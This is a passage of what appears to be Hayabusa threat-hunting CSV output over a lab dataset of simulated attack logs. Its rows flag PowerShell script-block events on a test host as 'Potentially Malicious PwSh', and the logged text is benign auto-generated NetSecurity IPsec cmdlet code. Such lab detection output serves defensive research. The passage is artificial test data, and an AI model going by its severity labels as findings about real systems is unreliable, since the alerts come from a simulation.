[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] 
[ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSe",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"tName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' -Alias '*' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"tName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] 
${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; 
Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 